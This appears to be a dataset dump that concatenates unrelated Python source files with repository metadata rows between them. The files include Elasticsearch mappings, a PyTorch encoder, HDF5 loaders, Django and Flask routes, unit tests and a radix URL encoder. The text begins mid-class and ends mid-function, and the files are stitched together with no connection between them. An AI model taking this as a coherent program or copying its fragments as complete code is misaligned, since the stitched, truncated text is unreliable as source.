site_decided = Boolean()
some_new_jobs = Boolean()
specific_programme = fields.id_name_field()
stage = fields.id_name_field()
status = fields.NormalizedKeyword()
team_members = fields.contact_or_adviser_field(include_dit_team=True)
total_investment = Double()
uk_company = fields.id_name_partial_field()
uk_company_decided = Boolean()
uk_region_locations = fields.id_name_field()
will_new_jobs_last_two_years = Boolean()
level_of_involvement_simplified = Keyword()
gross_value_added = Double()
MAPPINGS = {
'actual_uk_regions': lambda col: [
dict_utils.id_name_dict(c) for c in col.all()
],
'archived_by': dict_utils.contact_or_adviser_dict,
'associated_non_fdi_r_and_d_project': dict_utils.investment_project_dict,
'average_salary': dict_utils.id_name_dict,
'business_activities': lambda col: [dict_utils.id_name_dict(c) for c in col.all()],
'client_contacts': lambda col: [dict_utils.contact_or_adviser_dict(c) for c in col.all()],
'client_relationship_manager': dict_utils.adviser_dict_with_team,
'country_lost_to': dict_utils.id_name_dict,
'country_investment_originates_from': dict_utils.id_name_dict,
'created_by': dict_utils.adviser_dict_with_team,
'delivery_partners': lambda col: [
dict_utils.id_name_dict(c) for c in col.all()
],
'fdi_type': dict_utils.id_name_dict,
'fdi_value': dict_utils.id_name_dict,
'intermediate_company': dict_utils.id_name_dict,
'investment_type': dict_utils.id_name_dict,
'investor_company': dict_utils.id_name_dict,
'investor_company_country': dict_utils.id_name_dict,
'investor_type': dict_utils.id_name_dict,
'level_of_involvement': dict_utils.id_name_dict,
'likelihood_to_land': dict_utils.id_name_dict,
'project_assurance_adviser': dict_utils.adviser_dict_with_team,
'project_code': str,
'project_manager': dict_utils.adviser_dict_with_team,
'referral_source_activity': dict_utils.id_name_dict,
'referral_source_activity_marketing': dict_utils.id_name_dict,
'referral_source_activity_website': dict_utils.id_name_dict,
'referral_source_adviser': dict_utils.contact_or_adviser_dict,
'sector': dict_utils.sector_dict,
'specific_programme': dict_utils.id_name_dict,
'stage': dict_utils.id_name_dict,
'team_members': lambda col: [
dict_utils.contact_or_adviser_dict(c.adviser, include_dit_team=True) for c in col.all()
],
'uk_company': dict_utils.id_name_dict,
'uk_region_locations': lambda col: [
dict_utils.id_name_dict(c) for c in col.all()
],
}
SEARCH_FIELDS = (
'id',
'name',
'name.trigram',
'uk_company.name',
'uk_company.name.trigram',
'investor_company.name',
'investor_company.name.trigram',
'project_code.trigram',
)
class Meta:
"""Default document meta data."""
doc_type = DOC_TYPE
class Index:
doc_type = DOC_TYPE
| 38.417526
| 99
| 0.70106
| 6,955
| 0.933181
| 0
| 0
| 0
| 0
| 0
| 0
| 1,047
| 0.14048
|
42b106aaf54e3b2c19e17572d5a63e648baf43b4
| 1,670
|
py
|
Python
|
robust_sleep_net/models/modulo_net/features_encoder/fully_connected.py
|
Dreem-Organization/RobustSleepNet
|
c8ff3f6f857299eb2bf2e9400483084d5ecd4106
|
[
"MIT"
] | 16
|
2021-04-06T14:04:45.000Z
|
2022-03-11T14:37:08.000Z
|
robust_sleep_net/models/modulo_net/features_encoder/fully_connected.py
|
Dreem-Organization/RobustSleepNet
|
c8ff3f6f857299eb2bf2e9400483084d5ecd4106
|
[
"MIT"
] | null | null | null |
robust_sleep_net/models/modulo_net/features_encoder/fully_connected.py
|
Dreem-Organization/RobustSleepNet
|
c8ff3f6f857299eb2bf2e9400483084d5ecd4106
|
[
"MIT"
] | 4
|
2021-06-10T06:48:33.000Z
|
2022-03-26T22:29:07.000Z
|
from collections import OrderedDict
import torch
from torch import nn
class FullyConnected(nn.Module):
def __init__(self, features, layers=None, dropout=0.0):
super(FullyConnected, self).__init__()
print("Layers:", layers)
input_channels = 0
for feature in features:
input_channels += features[feature]["shape"][0]
self.dropout = nn.Dropout(dropout)
if isinstance(layers, list):
self.layers = nn.ModuleList(
[
nn.Sequential(
OrderedDict(
[
(
"linear_{}".format(i),
nn.Linear(
in_features=input_channels if i == 0 else layers[i - 1],
out_features=n_dim,
),
),
("relu_{}".format(i), nn.ReLU()),
]
)
)
for i, n_dim in enumerate(layers)
]
)
self.out_features = layers[-1]
elif layers is None:
self.layers = [nn.Identity()]
self.out_features = input_channels
def forward(self, x):
features = []
for feature in x:
features += [x[feature]]
features = torch.cat(features, -1)
for layer in self.layers:
features = self.dropout(features)
features = layer(features)
return features
| 32.115385
| 96
| 0.426946
| 1,596
| 0.955689
| 0
| 0
| 0
| 0
| 0
| 0
| 36
| 0.021557
|
35e91cbc49c53f3ff38da3a05748e14783d919ce
| 2,968
|
py
|
Python
|
data/rawdata_dataset.py
|
weiyw16/pytorch-CycleGAN-and-pix2pix
|
432a91ee6ca8dc606ba0116b27b0948abc48f295
|
[
"BSD-3-Clause"
] | null | null | null |
data/rawdata_dataset.py
|
weiyw16/pytorch-CycleGAN-and-pix2pix
|
432a91ee6ca8dc606ba0116b27b0948abc48f295
|
[
"BSD-3-Clause"
] | null | null | null |
data/rawdata_dataset.py
|
weiyw16/pytorch-CycleGAN-and-pix2pix
|
432a91ee6ca8dc606ba0116b27b0948abc48f295
|
[
"BSD-3-Clause"
] | null | null | null |
#import
import os
#import torch
#import torch.nn as nn
import torch.utils.data as Data
#import torchvision
import matplotlib.pyplot as plt
import h5py
#from torch.autograd import Variable
import numpy as np
import torch
class rawdataDataset(Data.Dataset):
def __init__(self):
super(rawdataDataset, self).__init__()
#def __init__(self, filename, root_dir, transform=None):
# self.frame = h5py.File(root_dir + filename, 'r')
# self.root_dir = root_dir
# self.transform = transform
def name(self):
return 'rawdataDataset'
@staticmethod
def modify_commandline_options(parser, is_train):
return parser
def initialize(self, opt):
self.opt = opt
self.root = opt.dataroot
self.dir_AB = os.path.join(opt.dataroot, opt.phase) # phase: train test
#self.AB_paths = sorted(make_dataset(self.dir_AB))
self.A_paths = self.dir_AB + "/A.h5"
self.B_paths = self.dir_AB + "/B.h5"
self.frameA = h5py.File(self.A_paths, 'r')
self.frameB = h5py.File(self.B_paths, 'r')
#assert(opt.resize_or_crop == 'resize_and_crop')
def __len__(self):
return len(self.frameA)
def __getitem__(self, index):
#img_name = torch.FloatTensor([[ self.frame["pic" + str(index)] ]])
#img_name = Variable(torch.FloatTensor([[ self.frame["pic" + str(index)] ]])
A = self.frameA["A" + str(index + 1)]
B = self.frameB["B" + str(index + 1)]
#A = torch.FloatTensor([[ self.frameA["A" + str(index)] ]])
#B = torch.FloatTensor([[ self.frameB["B" + str(index)] ]])
#AB_path = self.AB_paths[index]
#AB = Image.open(AB_path).convert('RGB')
#w, h = AB.size
#w2 = int(w / 2)
#A = AB.crop((0, 0, w2, h)).resize((self.opt.loadSize, self.opt.loadSize), Image.BICUBIC)
#B = AB.crop((w2, 0, w, h)).resize((self.opt.loadSize, self.opt.loadSize), Image.BICUBIC)
#A = transforms.ToTensor()(A)
#B = transforms.ToTensor()(B)
#w_offset = random.randint(0, max(0, self.opt.loadSize - self.opt.fineSize - 1))
#h_offset = random.randint(0, max(0, self.opt.loadSize - self.opt.fineSize - 1))
#A = A[:, h_offset:h_offset + self.opt.fineSize, w_offset:w_offset + self.opt.fineSize]
#B = B[:, h_offset:h_offset + self.opt.fineSize, w_offset:w_offset + self.opt.fineSize]
#A = transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))(A)
#B = transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))(B)
if self.opt.which_direction == 'BtoA':
input_nc = self.opt.output_nc
output_nc = self.opt.input_nc
else:
input_nc = self.opt.input_nc
output_nc = self.opt.output_nc
#return img_name
return {'A' : A, 'B' : B, 'A_paths' : self.A_paths, 'B_paths' : self.B_paths}
#%hist -f rawdata_dataset.py
| 38.545455
| 97
| 0.597035
| 2,718
| 0.915768
| 0
| 0
| 89
| 0.029987
| 0
| 0
| 1,561
| 0.525943
|
35eca7541efb5afc537b44ba4b6a0fc5cf5a30dd
| 310
|
py
|
Python
|
pythons/pythons/pythons_app/urls.py
|
BoyanPeychinov/python_web_framework
|
bb3a78c36790821d8b3a2b847494a1138d063193
|
[
"MIT"
] | null | null | null |
pythons/pythons/pythons_app/urls.py
|
BoyanPeychinov/python_web_framework
|
bb3a78c36790821d8b3a2b847494a1138d063193
|
[
"MIT"
] | null | null | null |
pythons/pythons/pythons_app/urls.py
|
BoyanPeychinov/python_web_framework
|
bb3a78c36790821d8b3a2b847494a1138d063193
|
[
"MIT"
] | null | null | null |
from django.urls import path
from . import views
from .views import IndexView
urlpatterns = [
# path('', views.index, name="index"),
path('', IndexView.as_view(), name="index"),
# path('create/', views.create, name="create"),
path('create/', views.PythonCreateView.as_view(), name="create"),
]
| 31
| 69
| 0.66129
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 111
| 0.358065
|
35ed1f868aeb38f0c96a30ed7f9536e255837e20
| 356
|
py
|
Python
|
tests/python/text_utility.py
|
Noxsense/mCRL2
|
dd2fcdd6eb8b15af2729633041c2dbbd2216ad24
|
[
"BSL-1.0"
] | 61
|
2018-05-24T13:14:05.000Z
|
2022-03-29T11:35:03.000Z
|
tests/python/text_utility.py
|
Noxsense/mCRL2
|
dd2fcdd6eb8b15af2729633041c2dbbd2216ad24
|
[
"BSL-1.0"
] | 229
|
2018-05-28T08:31:09.000Z
|
2022-03-21T11:02:41.000Z
|
tests/python/text_utility.py
|
Noxsense/mCRL2
|
dd2fcdd6eb8b15af2729633041c2dbbd2216ad24
|
[
"BSL-1.0"
] | 28
|
2018-04-11T14:09:39.000Z
|
2022-02-25T15:57:39.000Z
|
#~ Copyright 2014 Wieger Wesselink.
#~ Distributed under the Boost Software License, Version 1.0.
#~ (See accompanying file LICENSE_1_0.txt or http://www.boost.org/LICENSE_1_0.txt)
def read_text(filename):
with open(filename, 'r') as f:
return f.read()
def write_text(filename, text):
with open(filename, 'w') as f:
f.write(text)
| 29.666667
| 82
| 0.691011
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 184
| 0.516854
|
35ed5dd8d0b8879efae47e20f5661656b1666fbb
| 159
|
py
|
Python
|
Dumper/temp.py
|
NeerajGulia/kafka-monitor
|
cfcd39a37d22c86d3cebffe289687a030bb84353
|
[
"Apache-2.0"
] | null | null | null |
Dumper/temp.py
|
NeerajGulia/kafka-monitor
|
cfcd39a37d22c86d3cebffe289687a030bb84353
|
[
"Apache-2.0"
] | null | null | null |
Dumper/temp.py
|
NeerajGulia/kafka-monitor
|
cfcd39a37d22c86d3cebffe289687a030bb84353
|
[
"Apache-2.0"
] | null | null | null |
import datetime
t1 = datetime.datetime(2019, 3, 9, 10, 55, 30, 991882)
t2 = datetime.datetime(2019, 3, 10, 10, 55, 30, 991882)
print((t2-t1).total_seconds())
| 26.5
| 55
| 0.685535
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
35ee497682f551e6df5ef747e053a1c6578b24fe
| 1,401
|
py
|
Python
|
listools/llogic/is_descending.py
|
jgarte/listools
|
17ef56fc7dde701890213f248971d8dc7a6e6b7c
|
[
"MIT"
] | 2
|
2019-01-22T03:50:43.000Z
|
2021-04-22T16:12:17.000Z
|
listools/llogic/is_descending.py
|
jgarte/listools
|
17ef56fc7dde701890213f248971d8dc7a6e6b7c
|
[
"MIT"
] | 2
|
2019-01-22T03:57:49.000Z
|
2021-04-22T22:03:47.000Z
|
listools/llogic/is_descending.py
|
jgarte/listools
|
17ef56fc7dde701890213f248971d8dc7a6e6b7c
|
[
"MIT"
] | 1
|
2021-04-22T21:13:00.000Z
|
2021-04-22T21:13:00.000Z
|
def is_descending(input_list: list, step: int = -1) -> bool:
r"""llogic.is_descending(input_list[, step])
This function returns True if the input list is descending with a fixed
step, otherwise it returns False. Usage:
>>> alist = [3, 2, 1, 0]
>>> llogic.is_descending(alist)
True
The final value can be other than zero:
>>> alist = [12, 11, 10]
>>> llogic.is_descending(alist)
True
The list can also have negative elements:
>>> alist = [2, 1, 0, -1, -2]
>>> llogic.is_descending(alist)
True
It will return False if the list is not ascending:
>>> alist = [6, 5, 9, 2]
>>> llogic.is_descending(alist)
False
By default, the function uses steps of size 1 so the list below is not
considered as ascending:
>>> alist = [7, 5, 3, 1]
>>> llogic.is_descending(alist)
False
But the user can set the step argument to any value less than one:
>>> alist = [7, 5, 3, 1]
>>> step = -2
>>> llogic.is_descending(alist, step)
True
"""
if not isinstance(input_list, list):
raise TypeError('\'input_list\' must be \'list\'')
if not isinstance(step, int):
raise TypeError('\'step\' must be \'int\'')
if step > 1:
raise ValueError('\'step\' must be < 0')
aux_list = list(range(max(input_list), min(input_list)-1, step))
return input_list == aux_list
| 27.470588
| 75
| 0.608851
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,061
| 0.757316
|
35ef2ec3e738f6a7d680ddbb0d8cfed8a80181c4
| 384
|
py
|
Python
|
blazer/hpc/local/__init__.py
|
radiantone/blazer
|
4f369729a72a397a5a472f081002bf24cf22b69c
|
[
"CC0-1.0"
] | 4
|
2022-02-11T13:37:03.000Z
|
2022-02-26T00:25:13.000Z
|
blazer/hpc/local/__init__.py
|
radiantone/blazer
|
4f369729a72a397a5a472f081002bf24cf22b69c
|
[
"CC0-1.0"
] | null | null | null |
blazer/hpc/local/__init__.py
|
radiantone/blazer
|
4f369729a72a397a5a472f081002bf24cf22b69c
|
[
"CC0-1.0"
] | null | null | null |
from functools import partial
from pipe import select, where
from pydash import chunk
from pydash import filter_ as filter
from pydash import flatten, get, omit
from .primitives import parallel, pipeline, scatter
__all__ = (
"parallel",
"scatter",
"pipeline",
"partial",
"select",
"where",
"flatten",
"chunk",
"omit",
"get",
"filter",
)
| 16.695652
| 51
| 0.648438
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 88
| 0.229167
|
35f130f559ed7cd7af033555dccc66ba4d2035c4
| 304
|
py
|
Python
|
resumebuilder/resumebuilder.py
|
kinshuk4/ResumeBuilder
|
2c997f73b522c0668f3a66afb372bd91c6408b3c
|
[
"MIT"
] | 1
|
2020-01-04T05:54:19.000Z
|
2020-01-04T05:54:19.000Z
|
resumebuilder/resumebuilder.py
|
kinshuk4/ResumeBuilder
|
2c997f73b522c0668f3a66afb372bd91c6408b3c
|
[
"MIT"
] | null | null | null |
resumebuilder/resumebuilder.py
|
kinshuk4/ResumeBuilder
|
2c997f73b522c0668f3a66afb372bd91c6408b3c
|
[
"MIT"
] | null | null | null |
import yaml
def yaml2dict(filename):
with open(filename, "r") as stream:
resume_dict = yaml.load(stream)
return resume_dict
def main():
resumeFile = "../demo/sample-resume.yaml"
resume_dict = yaml2dict(resumeFile)
print(resume_dict)
if __name__ == '__main__':
main()
| 17.882353
| 45
| 0.664474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 41
| 0.134868
|
35f16309c334902b0ed8ed87b8f07d61caa46a9a
| 6,025
|
py
|
Python
|
backend/tests/unittests/metric_source/test_report/junit_test_report_tests.py
|
ICTU/quality-report
|
f6234e112228ee7cfe6476c2d709fe244579bcfe
|
[
"Apache-2.0"
] | 25
|
2016-11-25T10:41:24.000Z
|
2021-07-03T14:02:49.000Z
|
backend/tests/unittests/metric_source/test_report/junit_test_report_tests.py
|
ICTU/quality-report
|
f6234e112228ee7cfe6476c2d709fe244579bcfe
|
[
"Apache-2.0"
] | 783
|
2016-09-19T12:10:21.000Z
|
2021-01-04T20:39:15.000Z
|
backend/tests/unittests/metric_source/test_report/junit_test_report_tests.py
|
ICTU/quality-report
|
f6234e112228ee7cfe6476c2d709fe244579bcfe
|
[
"Apache-2.0"
] | 15
|
2015-03-25T13:52:49.000Z
|
2021-03-08T17:17:56.000Z
|
"""
Copyright 2012-2019 Ministerie van Sociale Zaken en Werkgelegenheid
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import datetime
import unittest
from unittest.mock import Mock
import urllib.error
from dateutil.tz import tzutc, tzlocal
from hqlib.metric_source import JunitTestReport
class JunitTestReportTest(unittest.TestCase):
""" Unit tests for the Junit test report class. """
# pylint: disable=protected-access
def setUp(self):
self.__junit = JunitTestReport()
def test_test_report(self):
""" Test retrieving a Junit test report. """
self.__junit._url_read = Mock(
return_value='<testsuites>'
' <testsuite tests="12" failures="2" errors="0" skipped="1" disabled="0">'
' <testcase><failure/></testcase>'
' <testcase><failure/></testcase>'
' </testsuite>'
'</testsuites>')
self.assertEqual(2, self.__junit.failed_tests('url'))
self.assertEqual(9, self.__junit.passed_tests('url'))
self.assertEqual(1, self.__junit.skipped_tests('url'))
def test_multiple_test_suites(self):
""" Test retrieving a Junit test report with multiple suites. """
self.__junit._url_read = Mock(
return_value='<testsuites>'
' <testsuite tests="5" failures="1" errors="0" skipped="1" disabled="1">'
' <testcase><failure/><failure/></testcase>'
' </testsuite>'
' <testsuite tests="3" failures="1" errors="1" skipped="0" disabled="0">'
' <testcase><failure/></testcase>'
' </testsuite>'
'</testsuites>')
self.assertEqual(3, self.__junit.failed_tests('url'))
self.assertEqual(3, self.__junit.passed_tests('url'))
self.assertEqual(2, self.__junit.skipped_tests('url'))
def test_http_error(self):
""" Test that the default is returned when a HTTP error occurs. """
self.__junit._url_read = Mock(side_effect=urllib.error.HTTPError(None, None, None, None, None))
self.assertEqual(-1, self.__junit.failed_tests('raise'))
self.assertEqual(-1, self.__junit.passed_tests('raise'))
self.assertEqual(-1, self.__junit.skipped_tests('raise'))
def test_missing_url(self):
""" Test that the default is returned when no urls are provided. """
self.assertEqual(-1, self.__junit.failed_tests())
self.assertEqual(-1, self.__junit.passed_tests())
self.assertEqual(-1, self.__junit.skipped_tests())
self.assertEqual(datetime.datetime.min, self.__junit.datetime())
def test_incomplete_xml(self):
""" Test that the default is returned when the xml is incomplete. """
self.__junit._url_read = Mock(return_value='<testsuites></testsuites>')
self.assertEqual(-1, self.__junit.failed_tests('url'))
def test_faulty_xml(self):
""" Test incorrect XML. """
self.__junit._url_read = Mock(return_value='<testsuites><bla>')
self.assertEqual(-1, self.__junit.failed_tests('url'))
def test_datetime_with_faulty_xml(self):
""" Test incorrect XML. """
self.__junit._url_read = Mock(return_value='<testsuites><bla>')
self.assertEqual(datetime.datetime.min, self.__junit.datetime('url'))
def test_report_datetime(self):
""" Test that the date and time of the test suite is returned. """
self.__junit._url_read = Mock(
return_value='<testsuites>'
' <testsuite name="Art" timestamp="2016-07-07T12:26:44">'
' </testsuite>'
'</testsuites>')
self.assertEqual(
datetime.datetime(2016, 7, 7, 12, 26, 44, tzinfo=tzutc()).astimezone(tzlocal()).replace(tzinfo=None),
self.__junit.datetime('url'))
def test_missing_report_datetime(self):
""" Test that the minimum datetime is returned if the url can't be opened. """
self.__junit._url_read = Mock(side_effect=urllib.error.HTTPError(None, None, None, None, None))
self.assertEqual(datetime.datetime.min, self.__junit.datetime('url'))
def test_incomplete_xml_datetime(self):
""" Test that the minimum datetime is returned when the xml is incomplete. """
self.__junit._url_read = Mock(return_value='<testsuites></testsuites>')
self.assertEqual(datetime.datetime.min, self.__junit.datetime('url'))
def test_incomplete_xml_no_timestamp(self):
""" Test that the minimum datetime is returned when the xml is incomplete. """
self.__junit._url_read = Mock(return_value='<testsuites><testsuite></testsuite></testsuites>')
self.assertEqual(datetime.datetime.min, self.__junit.datetime('url'))
def test_urls(self):
""" Test that the urls point to the HTML versions of the reports. """
self.assertEqual(['http://server/html/htmlReport.html'],
self.__junit.metric_source_urls('http://server/junit/junit.xml'))
def test_url_regexp(self):
""" Test that the default regular expression to generate the HTML version of the urls can be changed. """
junit = JunitTestReport(metric_source_url_re="junit.xml$", metric_source_url_repl="junit.html")
self.assertEqual(['http://server/junit.html'], junit.metric_source_urls('http://server/junit.xml'))
| 47.81746
| 113
| 0.64249
| 5,249
| 0.871203
| 0
| 0
| 0
| 0
| 0
| 0
| 2,486
| 0.412614
|
35f24e93301e26ad076b53b869df2630d390d615
| 965
|
py
|
Python
|
lang/Python/compare-sorting-algorithms-performance-6.py
|
ethansaxenian/RosettaDecode
|
8ea1a42a5f792280b50193ad47545d14ee371fb7
|
[
"MIT"
] | 1
|
2018-11-09T22:08:38.000Z
|
2018-11-09T22:08:38.000Z
|
lang/Python/compare-sorting-algorithms-performance-6.py
|
ethansaxenian/RosettaDecode
|
8ea1a42a5f792280b50193ad47545d14ee371fb7
|
[
"MIT"
] | null | null | null |
lang/Python/compare-sorting-algorithms-performance-6.py
|
ethansaxenian/RosettaDecode
|
8ea1a42a5f792280b50193ad47545d14ee371fb7
|
[
"MIT"
] | 1
|
2018-11-09T22:08:40.000Z
|
2018-11-09T22:08:40.000Z
|
sort_functions = [
builtinsort, # see implementation above
insertion_sort, # see [[Insertion sort]]
insertion_sort_lowb, # ''insertion_sort'', where sequential search is replaced
# by lower_bound() function
qsort, # see [[Quicksort]]
qsortranlc, # ''qsort'' with randomly choosen ''pivot''
# and the filtering via list comprehension
qsortranpart, # ''qsortranlc'' with filtering via ''partition'' function
qsortranpartis, # ''qsortranpart'', where for a small input sequence lengths
] # ''insertion_sort'' is called
if __name__=="__main__":
import sys
sys.setrecursionlimit(10000)
write_timings(npoints=100, maxN=1024, # 1 <= N <= 2**10 an input sequence length
sort_functions=sort_functions,
sequence_creators = (ones, range, shuffledrange))
plot_timings()
| 50.789474
| 85
| 0.598964
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 450
| 0.466321
|
35f445a5ba07dee2c2143db897f87a8a3259db16
| 6,300
|
py
|
Python
|
server/organization/tests.py
|
NicholasNagy/ALTA
|
ca07627481ee91f2969b0fc8e8f15e2a37b3e992
|
[
"Apache-2.0"
] | 3
|
2020-09-09T23:26:29.000Z
|
2020-10-17T22:58:34.000Z
|
server/organization/tests.py
|
NicholasNagy/ALTA
|
ca07627481ee91f2969b0fc8e8f15e2a37b3e992
|
[
"Apache-2.0"
] | 294
|
2020-09-27T17:20:50.000Z
|
2021-06-23T01:44:09.000Z
|
server/organization/tests.py
|
NicholasNagy/ALTA
|
ca07627481ee91f2969b0fc8e8f15e2a37b3e992
|
[
"Apache-2.0"
] | 10
|
2020-10-07T05:25:30.000Z
|
2021-05-01T05:32:59.000Z
|
from rest_framework import status
from rest_framework.test import APITestCase
from rest_framework.test import APIClient
from django.db.models import signals
import factory
from user_account.models import CustomUser
from .models import Organization
class OrganizationTestCase(APITestCase):
def setUp(self):
self.client = APIClient()
# Create each type of user
self.system_admin = CustomUser.objects.create(
user_name='system_admin1',
email='system_admin1@email.com',
password='password1',
first_name='system1',
last_name='admin1',
role='SA',
is_active=True)
self.inventory_manager = CustomUser.objects.create(
user_name='inventory_manager1',
email='inventory_manager1@email.com',
password='password1',
first_name='inventory1',
last_name='manager1',
role='IM',
is_active=True)
self.stock_keeper = CustomUser.objects.create(
user_name='stock_keeper1',
email='stock_keeper1@email.com',
password='password1',
first_name='inventory1',
last_name='keeper1',
role='SK',
is_active=True)
@factory.django.mute_signals(signals.pre_save, signals.post_save)
def test_create_organization_sys_admin_success(self):
""" Organization was created correctly """
self.client.force_authenticate(user=self.system_admin)
data = {'org_name': 'test_case', 'address': ['Florida']}
response = self.client.post("/organization/", data, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_create_organization_inventory_manager_success(self):
""" Inventory manager and Stock Keeper is not allowed to create an organization """
self.client.force_authenticate(user=self.inventory_manager)
data = {'org_name': 'test_case'}
request = self.client.post("/organization/", data)
self.assertEqual(request.status_code, status.HTTP_403_FORBIDDEN)
self.client.force_authenticate(user=self.stock_keeper)
new_request = self.client.post("/organization/", data)
self.assertEqual(new_request.status_code, status.HTTP_403_FORBIDDEN)
def test_create_organization_failure(self):
""" User can't create organization if missing fields """
self.client.force_authenticate(user=self.system_admin)
data = {}
request = self.client.post("/organization/", data, format='json')
self.assertEqual(request.status_code, status.HTTP_400_BAD_REQUEST)
def test_organization_unauthorized_request(self):
""" User can't access any of the method if token is not in header of request """
request = self.client.get("/organization/")
self.assertEqual(request.status_code, status.HTTP_401_UNAUTHORIZED)
def test_organization_unauthorized_clearence(self):
""" IM and SK can't delete an organization """
self.client.force_authenticate(user=self.inventory_manager)
request = self.client.delete("/organization/")
self.assertEqual(request.status_code, status.HTTP_403_FORBIDDEN)
self.client.force_authenticate(user=self.stock_keeper)
new_request = self.client.delete("/organization/")
self.assertEqual(new_request.status_code, status.HTTP_403_FORBIDDEN)
def test_get_all_organization(self):
""" IM can't get a list of organization """
self.client.force_authenticate(user=self.inventory_manager)
request = self.client.get("/organization/")
self.assertEqual(request.status_code, status.HTTP_403_FORBIDDEN)
def test_unauthorized_get_all_organization(self):
""" SK can't get a list of organization """
self.client.force_authenticate(user=self.stock_keeper)
request = self.client.get("/organization/")
self.assertEqual(request.status_code, status.HTTP_403_FORBIDDEN)
class InventoryItemRefreshTestCase(APITestCase):
fixtures = ["users.json", "organizations.json"]
@factory.django.mute_signals(signals.pre_save, signals.post_save)
def setUp(self):
self.client = APIClient()
self.organization = Organization.objects.get(pk=1).org_id
self.system_admin = CustomUser.objects.get(pk=1)
self.inventory_manager = CustomUser.objects.get(pk=2)
self.stock_keeper = CustomUser.objects.get(pk=3)
def test_org_inventory_item_refresh_time_sa(self):
""" Timing has been updated correctly """
self.client.force_authenticate(user=self.system_admin)
data = {'time': ['60'], 'new_job_interval': ['minutes'], 'ftp_location': ['ftp://host/inventory'], 'organization_id': ['1'], 'file': ['dummy_data.xlsx']}
response = self.client.post("/InventoryItemRefreshTime/", data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_org_inventory_item_refresh_time_im(self):
""" Timing has been updated correctly """
self.client.force_authenticate(user=self.inventory_manager)
data = {'time': ['60'], 'new_job_interval': ['minutes'], 'ftp_location': ['ftp://host/inventory'], 'organization_id': ['1'], 'file': ['dummy_data.xlsx']}
response = self.client.post("/InventoryItemRefreshTime/", data)
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_org_inventory_item_refresh_time_sk(self):
""" Timing shall not be updated by SK """
self.client.force_authenticate(user=self.stock_keeper)
data = {"organization": self.organization, "new_job_timing": "14"}
request = self.client.post("/InventoryItemRefreshTime/", data, format='json')
self.assertEqual(request.status_code, status.HTTP_403_FORBIDDEN)
def test_org_item_refresh_time_fail(self):
"""
Timing can't be updated correctly for an
organization that doesnt exist
"""
self.client.force_authenticate(user=self.system_admin)
data = {"organization_id": "1234", "time": "14"}
response = self.client.post("/InventoryItemRefreshTime/", data)
self.assertEqual(response.status_code, status.HTTP_500_INTERNAL_SERVER_ERROR)
| 45.985401
| 161
| 0.686667
| 6,046
| 0.959683
| 0
| 0
| 811
| 0.12873
| 0
| 0
| 1,545
| 0.245238
|
35f470bfac10a58409ff19aa1d364eb85ab7359d
| 1,656
|
py
|
Python
|
src/mumblecode/convert.py
|
Mumbleskates/mumblecode
|
0221c33a09df154bf80ece73ff907c51d2a971f0
|
[
"MIT"
] | 1
|
2016-05-17T23:07:38.000Z
|
2016-05-17T23:07:38.000Z
|
src/mumblecode/convert.py
|
Mumbleskates/mumblecode
|
0221c33a09df154bf80ece73ff907c51d2a971f0
|
[
"MIT"
] | null | null | null |
src/mumblecode/convert.py
|
Mumbleskates/mumblecode
|
0221c33a09df154bf80ece73ff907c51d2a971f0
|
[
"MIT"
] | null | null | null |
# coding=utf-8
from math import log2, ceil
# valid chars for a url path component: a-z A-Z 0-9 .-_~!$&'()*+,;=:@
# For the default set here (base 72) we have excluded $'();:@
radix_alphabet = ''.join(sorted(
"0123456789"
"abcdefghijklmnopqrstuvwxyz"
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
".-_~!&*+,="
))
radix = len(radix_alphabet)
radix_lookup = {ch: i for i, ch in enumerate(radix_alphabet)}
length_limit = ceil(128 / log2(radix)) # don't decode numbers much over 128 bits
# TODO: add radix alphabet as parameter
# TODO: fix format so length conveys m ore information (e.g. 0 and 00 and 000 are different with decimal alphabet)
def int_to_natural(i):
i *= 2
if i < 0:
i = -i - 1
return i
def natural_to_int(n):
sign = n & 1
n >>= 1
return -n - 1 if sign else n
def natural_to_url(n):
"""Accepts an int and returns a url-compatible string representing it"""
# map from signed int to positive int
url = ""
while n:
n, digit = divmod(n, radix)
url += radix_alphabet[digit]
return url or radix_alphabet[0]
def url_to_natural(url):
"""Accepts a string and extracts the int it represents in this radix encoding"""
if not url or len(url) > length_limit:
return None
n = 0
try:
for ch in reversed(url):
n = n * radix + radix_lookup[ch]
except KeyError:
return None
return n
def int_to_bytes(i, order='little'):
byte_length = (i.bit_length() + 7 + (i >= 0)) >> 3
return i.to_bytes(byte_length, order, signed=True)
def bytes_to_int(b, order='little'):
return int.from_bytes(b, order, signed=True)
| 24.352941
| 114
| 0.634662
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 627
| 0.378623
|
35f52784cb920f6695ea0214e66ce046c4ba0969
| 961
|
py
|
Python
|
flaskapp/routes.py
|
vijay0707/Send-Email-Flask
|
3e8f981c5ef4c4051f61b5229eb3e56a35142bc7
|
[
"MIT"
] | null | null | null |
flaskapp/routes.py
|
vijay0707/Send-Email-Flask
|
3e8f981c5ef4c4051f61b5229eb3e56a35142bc7
|
[
"MIT"
] | null | null | null |
flaskapp/routes.py
|
vijay0707/Send-Email-Flask
|
3e8f981c5ef4c4051f61b5229eb3e56a35142bc7
|
[
"MIT"
] | null | null | null |
from flaskapp import app, db, mail
from flask import render_template, url_for
from flask import request, flash, redirect
# from flaskapp.model import User
from flaskapp.form import SurveyForm
from flask_mail import Message
@app.route('/', methods = ['POST', 'GET'])
def form():
form = SurveyForm()
if form.validate_on_submit():
# user = User(name=form.name.data, email=form.email.data)
# db.session.add(user)
